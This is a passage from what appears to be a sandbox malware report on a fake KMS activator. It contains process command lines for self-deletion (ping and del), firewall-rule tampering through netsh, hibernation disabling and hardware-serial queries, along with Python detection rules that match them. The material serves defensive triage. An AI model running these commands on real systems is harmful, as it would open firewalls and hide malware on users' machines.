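                      "location": "http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d"}},
]

BROWSER_UA_PREFIXES = ("Mozilla/", "Opera/")


def resolve(name, answers=DNS_ANSWERS, max_hops=8):
    """Follow CNAMEs from `name`; return (terminal name, sorted A addresses).

    Stops on a CNAME loop or after max_hops. A chain whose terminal has no
    A record in the capture (time.windows.com here) yields an empty list.
    """
    seen, current = [], name
    while current not in seen and len(seen) < max_hops:
        seen.append(current)
        targets = [v for n, t, v in answers if n == current and t == "CNAME"]
        if not targets:
            break
        current = targets[0]
    return current, sorted(v for n, t, v in answers if n == current and t == "A")


def names_for_ip(ip, answers=DNS_ANSWERS):
    """Queried names (chain heads, never themselves a CNAME target) ending at `ip`."""
    heads = {n for n, _, _ in answers} - {v for _, t, v in answers if t == "CNAME"}
    return sorted(n for n in heads if ip in resolve(n, answers)[1])


def classify_session(s):
    """Reasons an analyst should look at this session (empty list = nothing notable)."""
    flags = []
    host = s["req_headers"].get("Host", "")
    method = s["request"].split(" ", 1)[0]
    ua = s["req_headers"].get("User-Agent")
    if ua is not None and not ua.startswith(BROWSER_UA_PREFIXES):
        flags.append("non-browser User-Agent: " + ua)
    if method == "POST" and s["req_headers"].get("Content-Length") == "0":
        flags.append("empty POST beacon to " + host)
    location = s["resp_headers"].get("location", "")
    if (s["status"] == 302 and urlsplit(location).hostname == "ww25." + host
            and "__tad=" in s["resp_headers"].get("set-cookie", "")):
        flags.append("302 to ww25." + host + " (domain-parking style landing page)")
    if "\\AppData\\Local\\" in s["process"]:
        flags.append("client runs from a user-writable directory")
    if names_for_ip(s["dst"]) != [host]:
        flags.append("Host header does not match DNS answer for " + s["dst"])
    return flags


def indicators(sessions=HTTP_SESSIONS):
    """Map each contacted host to (resolved IPs, flags), for a quick IOC list."""
    return {s["req_headers"]["Host"]: (resolve(s["req_headers"]["Host"])[1], classify_session(s))
            for s in sessions}


if __name__ == "__main__":
    for host, (ips, flags) in indicators().items():
        print(host, ips, *flags, sep="\n  ")
```

`du.testjj.com` resolves in the capture but is never contacted over HTTP in this report, so `indicators()` does not list it; add it by hand if you want the full DNS set in an IOC export. The Host-vs-DNS cross-check is there because a beacon that sends a Host header for a name the sample never resolved usually means hard-coded IPs or domain fronting, which is worth a separate look.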
Target ID:1
Start time:20:19:48
Start date:24/07/2024
Path:C:\Users\user\Desktop\HEU_KMS_Activator.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\HEU_KMS_Activator.exe"
Imagebase:0x400000
File size:5'596'080 bytes
MD5 hash:28C6BC044E78763A789638242F708F9E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:20:19:48
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Imagebase:0x630000
File size:921'936 bytes
MD5 hash:1474BD3EDA2E087560754241A0B92991
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 87%, ReversingLabs
Reputation:low
Has exited:true

Target ID:3
Start time:20:19:49
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe
Imagebase:0xbf0000
File size:921'936 bytes
MD5 hash:1474BD3EDA2E087560754241A0B92991
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 87%, ReversingLabs
Reputation:low
Has exited:false

Target ID:4
Start time:20:19:49
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe
Imagebase:0xd30000
File size:5'054'976 bytes
MD5 hash:7CD8B711BE93FF8858B7DC753C4065CA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Joe Sandbox ML
  • Detection: 66%, ReversingLabs
Reputation:low
Has exited:false

Target ID:5
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):true
Commandline:ping -n 3 127.1
Imagebase:0x6c0000
File size:18'944 bytes
MD5 hash:B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\drivers\DvLayout.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook
Imagebase:0x370000
File size:278'352 bytes
MD5 hash:99B17FCCE8D54EA90FF5C0B9EF4FCE73
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 69%, ReversingLabs
Reputation:low
Has exited:true

Target ID:12
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:13
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /h off
Imagebase:0x490000
File size:78'336 bytes
MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:14
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:20:19:50
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install
Imagebase:0xe60000
File size:644'944 bytes
MD5 hash:35C545E719D8D04771BE35081626CE3B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 58%, ReversingLabs
Has exited:true

Target ID:18
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff74cd00000
File size:329'504 bytes
MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Imagebase:0x1770000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:20:19:51
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:20:19:51
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Imagebase:0x1770000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic BaseBoard get SerialNumber
Imagebase:0x120000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\_temp07242019502489\7Z.EXE
Wow64 process (32bit):true
Commandline:C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489
Imagebase:0x400000
File size:587'776 bytes
MD5 hash:42BADC1D2F03A8B1E4875740D3D49336
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 0%, ReversingLabs
Has exited:true

Target ID:35
Start time:20:19:54
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:20:19:54
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:20:19:56
Start date:24/07/2024
Path:C:\Windows\_temp07242019502489\kms_x64.exe
Wow64 process (32bit):false
Commandline:C:\Windows\_temp07242019502489\kms_x64.exe
Imagebase:0x7ff67b700000
File size:1'092'608 bytes
MD5 hash:99DF73A907996E98E96917FAE743B506
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 4%, ReversingLabs
Has exited:false

Target ID:45
Start time:20:20:33
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:20:20:53
Start date:24/07/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:0x7ff777fc0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:20:20:53
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true
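A triage pass over the process entries above, added here as an example and not Joe Sandbox's own signature engine. It transcribes the target id, image path and command line of the processes that matter and runs narrow regex rules for the behaviours visible in the list: `ping -n 3 127.1` used as a sleep before `del` (the dropper removing itself), the `netsh advfirewall` rule deletion and re-creation, `powercfg /h off`, the baseboard serial query through WMIC, the 7-Zip extraction into a `C:\Windows\_temp…` directory, and executables started from `System32\drivers` or from a system-looking folder under `%LOCALAPPDATA%`. Rule names and regexes are this example's own. One caveat that the list itself shows: the self-delete and both firewall changes are issued through `cmd.exe /c`, so a rule keyed only on the child image (PING.EXE, netsh.exe) sees a harmless-looking fragment; the parent command line is what ties the chain together, which is why the rules below match on the full command line.

```python
"""Triage rules over the process list of this report.

Added example, not Joe Sandbox's signature engine. PROCESSES is transcribed
from the entries above as (target id, image path, command line); the rule
names and regexes are this example's own and deliberately narrow.
"""
import re

PROCESSES = [
    (1, r"C:\Users\user\Desktop\HEU_KMS_Activator.exe",
     r'"C:\Users\user\Desktop\HEU_KMS_Activator.exe"'),
    (6, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe'),
    (9, r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini"),
    (11, r"C:\Windows\System32\drivers\DvLayout.exe",
     r'"C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook'),
    (13, r"C:\Windows\SysWOW64\powercfg.exe", "powercfg /h off"),
    (17, r"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe",
     r'"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install'),
    (21, r"C:\Windows\SysWOW64\netsh.exe",
     'netsh advfirewall firewall delete rule name="HEU_KMS_Activator"'),
    (27, r"C:\Windows\SysWOW64\netsh.exe",
     r'netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"'),
    (32, r"C:\Windows\SysWOW64\wbem\WMIC.exe", "wmic BaseBoard get SerialNumber"),
    (34, r"C:\Windows\_temp07242019502489\7Z.EXE",
     r"C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489"),
    (46, r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable'),
]

# Rules evaluated against the full command line.
CMDLINE_RULES = {
    # ping used as a sleep, chained with del: a dropper removing itself
    "ping_sleep_then_del": re.compile(r"\bping\b[^&]*-n\s+\d+[^&]*&\s*del\b", re.I),
    "firewall_rule_change": re.compile(r"\bnetsh\b.*\badvfirewall\s+firewall\s+(add|delete)\s+rule\b", re.I),
    "hibernation_disabled": re.compile(r"\bpowercfg(\.exe)?\s+[/-]h\s+off\b", re.I),
    "hardware_serial_query": re.compile(r"\bwmic\b.*\bbaseboard\b.*\bserialnumber\b", re.I),
    "archive_extract_in_windir": re.compile(r"\b7z(\.exe)?\s+x\s+C:\\Windows\\", re.I),
}

# Rules evaluated against the image path only.
IMAGE_RULES = {
    # a .exe living in the drivers directory is not a driver
    "exe_in_drivers_dir": re.compile(r"^C:\\Windows\\System32\\drivers\\[^\\]+\.exe$", re.I),
    # system-looking folder name under a user-writable path
    "masquerading_user_path": re.compile(r"\\AppData\\Local\\Microsoft\\Event Viewer\\", re.I),
    "exe_in_windir_temp": re.compile(r"^C:\\Windows\\_temp\d+\\", re.I),
}


def hits_for(image, cmdline):
    """Sorted rule names that fire for one process."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]
    hits += [name for name, rx in IMAGE_RULES.items() if rx.search(image)]
    return sorted(hits)


def triage(processes=PROCESSES):
    """Map target id -> rule hits, keeping only processes that fired something."""
    result = {}
    for target_id, image, cmdline in processes:
        hits = hits_for(image, cmdline)
        if hits:
            result[target_id] = hits
    return result


if __name__ == "__main__":
    for target_id, hits in sorted(triage().items()):
        print(f"target {target_id}: {', '.join(hits)}")
```

Targets 1 (the submitted sample) and 46 (`MpCmdRun.exe -wdenable`, Defender re-enabling itself) produce no hits, which is the intended outcome: the rules are meant to surface the dropper chain and the persistence components, not every process in the tree. In a real pipeline, feed `hits_for` the parent command line alongside the child's, since the list shows every netsh and ping instance here originating from a `cmd.exe /c` wrapper.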


    Execution Graph

    Execution Coverage:18.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:21.2%
    Total number of Nodes:1434
    Total number of Limit Nodes:40
    execution_graph: node and edge data for the interactive graph viewer (not reproduced; the dump is truncated). The function nodes it lists call GetDlgItem, SetFilePointer, GlobalAlloc/GlobalFree, SendMessageA, SendMessageTimeoutA, FindWindowExA, CreateFontIndirectA, SetWindowLongA, SetTimer, ExpandEnvironmentStringsA, SHBrowseForFolderA, GetDiskFreeSpaceA, CreateThread, CreatePopupMenu/TrackPopupMenu, and OpenClipboard/EmptyClipboard/SetClipboardData.
40143a 18 API calls 4104->4106 4105->4103 4105->4104 4108 4019e4 4105->4108 4106->4108 4107->4108 4109 4022eb 4110 401450 18 API calls 4109->4110 4111 4022f3 GetFileVersionInfoSizeA 4110->4111 4112 402ef6 4111->4112 4113 402318 GlobalAlloc 4111->4113 4113->4112 4114 40232c GetFileVersionInfoA 4113->4114 4115 40236e GlobalFree 4114->4115 4116 40233b VerQueryValueA 4114->4116 4115->4112 4116->4115 4117 402354 4116->4117 4122 405c1f wsprintfA 4117->4122 4120 402360 4123 405c1f wsprintfA 4120->4123 4122->4120 4123->4115 4124 403e6d lstrcpynA lstrlenA 3119 4019f0 3171 401450 3119->3171 3123 401a1b 3124 401a36 3123->3124 3125 401a2e 3123->3125 3217 405cc1 lstrcpynA 3124->3217 3216 405cc1 lstrcpynA 3125->3216 3128 401a41 3218 405fc0 lstrlenA CharPrevA 3128->3218 3129 401a34 3180 405ce3 3129->3180 3136 401a6a CompareFileTime 3143 401a53 3136->3143 3137 401b7b 3190 404d10 3137->3190 3140 405eff 9 API calls 3140->3143 3141 404d10 25 API calls 3144 401b42 3141->3144 3143->3136 3143->3137 3143->3140 3146 405cc1 lstrcpynA 3143->3146 3163 401b22 3143->3163 3170 401b2f 3143->3170 3189 405b31 GetFileAttributesA CreateFileA 3143->3189 3221 405f2f FindFirstFileA 3143->3221 3224 405b11 GetFileAttributesA 3143->3224 3227 4060ec 3143->3227 3245 4059fb 3143->3245 3148 405eff 9 API calls 3144->3148 3146->3143 3147 405eff 9 API calls 3149 401bac 3147->3149 3151 401b5d 3148->3151 3150 401bbb SetFileTime 3149->3150 3152 401bca FindCloseChangeNotification 3149->3152 3150->3152 3152->3151 3154 401bdb 3152->3154 3155 401be0 3154->3155 3156 401bf3 3154->3156 3157 4060ec 18 API calls 3155->3157 3158 4060ec 18 API calls 3156->3158 3160 401be8 lstrcatA 3157->3160 3161 401bfb 3158->3161 3160->3161 3162 405eff 9 API calls 3161->3162 3164 401c06 3162->3164 3165 401b65 3163->3165 3166 401b25 3163->3166 3167 4059fb MessageBoxIndirectA 3164->3167 3168 405eff 9 API calls 3165->3168 3169 405eff 9 API calls 3166->3169 3167->3151 3168->3151 3169->3170 3170->3141 3172 401456 3171->3172 3173 4060ec 18 API 
